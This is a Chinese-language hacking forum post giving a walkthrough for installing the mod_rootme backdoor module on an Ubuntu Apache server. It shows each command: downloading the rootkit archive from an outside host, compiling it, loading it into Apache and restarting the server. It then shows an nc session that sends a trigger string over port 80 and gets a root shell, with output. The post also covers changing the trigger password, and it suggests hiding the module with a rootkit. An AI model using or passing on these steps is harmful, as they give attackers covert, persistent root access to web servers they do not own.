切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
367 端口复用 Apache mod_rootme[复制链接]
发表于 2012-12-7 00:12:34 | 显示全部楼层 |!read_mode!

为了更加隐蔽 需要ROOTKIT的隐藏文件功能进行配合 吧ROOTME。SO 核 APACHE MOD 隐藏了 不说了 你懂的 看下文
类似端口复用打开SERVER

UBUNTU默认安装的APACHE模块在这里

  1. root@Server:/etc/apache2/mods-available# pwd
  2. /etc/apache2/mods-available
复制代码
随便微观一个

  1. root@Server:/etc/apache2/mods-available# cat proxy.load
  2. LoadModule proxy_module /usr/lib/apache2/modules/mod_proxy.so
复制代码
下载模块

  1. root@Server:/etc/apache2/mods-available# wget http://lucky.fuzzexp.org/file/r00tk1t/mod_rootme-0.4.tar.gz
  2. root@Server:/etc/apache2/mods-available# tar xf mod_rootme-0.4.tar.gz
  3. root@Server:/etc/apache2/mods-available# cd mod_rootme-0.4/
  4. root@Server:/etc/apache2/mods-available/mod_rootme-0.4# ls
  5. client.exe  httpd20.h  Makefile    mod_rootme22.c  mod_rootme.c  mrm_server.h
  6. httpd13.h   httpd22.h  Makefile32  mod_rootme2.c   mrm_client.c  README.txt
  7. root@Server:/etc/apache2/mods-available/mod_rootme-0.4#
复制代码

编译模块


  1. root@Server:/etc/apache2/mods-available/mod_rootme-0.4# make linux
  2. gcc -s -fPIC -shared mod_rootme.c  -o mod_rootme.so  -lutil -DLINUX
  3. gcc -s -fPIC -shared mod_rootme2.c -o mod_rootme2.so -lutil -DLINUX
  4. gcc -s -fPIC -shared mod_rootme22.c -o mod_rootme22.so -lutil -DLINUX
  5. gcc -s mrm_client.c -o client
  6. root@Server:/etc/apache2/mods-available/mod_rootme-0.4#
复制代码

复制so文件到APACHE模块目录 注意APACHE版本 编译出来的rootme游很多版本


  1. root@Server:/etc/apache2/mods-available/mod_rootme-0.4# cp mod_rootme22.so /usr/lib/apache2/modules/
复制代码

加载模块 进入 mods-enabled 目录

  1. root@Server:/etc/apache2/mods-available# cd ..
  2. root@Server:/etc/apache2# cd mods-enabled/
  3. root@Server:/etc/apache2/mods-enabled# nano rootme22.load
复制代码

如下


  1. LoadModule rootme22_module /usr/lib/apache2/modules/mod_rootme22.so
复制代码

重启APACHE


  1. root@Server:/etc/apache2/mods-available/mod_rootme-0.4# /etc/init.d/apache2 restart
  2. * Restarting web server apache2                                                 ... waiting   
复制代码

链接后门


  1. brk<~> $ nc 5.5.5.5 80
  2. GET root #发送特征
  3. rootme-0.3 ready
  4. id
  5. uid=0(root) gid=0(root) groups=0(root)
  6. pwd
  7. /
  8. ls -la
  9. total 89
  10. drwxr-xr-x 21 root root  4096 Nov 14 21:00 .
  11. drwxr-xr-x 21 root root  4096 Nov 14 21:00 ..
  12. drwxr-xr-x  2 root root  4096 Nov 14 21:02 bin
  13. drwxr-xr-x  4 root root  1024 Nov 14 21:03 boot
  14. drwxr-xr-x 18 root root  3580 Nov 22 20:53 dev
  15. drwxr-xr-x 78 root root  4096 Nov 22 21:22 etc
  16. drwxr-xr-x  4 root root  4096 Nov 14 21:03 home
  17. lrwxrwxrwx  1 root root    37 Nov 14 21:00 initrd.img -> boot/initrd.img-2.6.35-22-generic-pae
  18. drwxr-xr-x 14 root root 12288 Nov 17 20:43 lib
  19. drwx------  2 root root 16384 Nov 14 20:58 lost+found
  20. drwxr-xr-x  3 root root  4096 Nov 14 20:59 media
  21. drwxr-xr-x  2 root root  4096 Oct  7  2010 mnt
  22. drwxr-xr-x  3 root root  4096 Nov 14 21:20 opt
  23. dr-xr-xr-x 90 root root     0 Nov 22 20:53 proc
  24. drwx------  4 root root  4096 Nov 14 21:20 root
  25. drwxr-xr-x  2 root root  4096 Nov 17 20:43 sbin
  26. drwxr-xr-x  2 root root  4096 May  9  2010 selinux
  27. drwxr-xr-x  2 root root  4096 Nov 14 20:58 srv
  28. drwxr-xr-x 13 root root     0 Nov 22 20:53 sys
  29. drwxrwxrwt  2 root root  4096 Nov 22 21:34 tmp
  30. drwxr-xr-x 10 root root  4096 Nov 14 20:58 usr
  31. drwxr-xr-x 14 root root  4096 Nov 14 21:02 var
  32. lrwxrwxrwx  1 root root    34 Nov 14 21:00 vmlinuz -> boot/vmlinuz-2.6.35-22-generic-pae
复制代码

也可以用这两个链接



修改特征
编辑
mod_rootme22.c
文件(注意APACHE版本)


  1. #define ROOT_KEY        "root"
复制代码

中 的 ROOT 改成密码 例如我的


  1. #define ROOT_KEY        "helen"
复制代码

重新编译 替换 重启APACHE 发送特征


  1. brk<~> $ nc 5.5.5.5 80
  2. GET helen
  3. rootme-0.3 ready
  4. id
  5. uid=0(root) gid=0(root) groups=0(root)
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-2 14:44

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部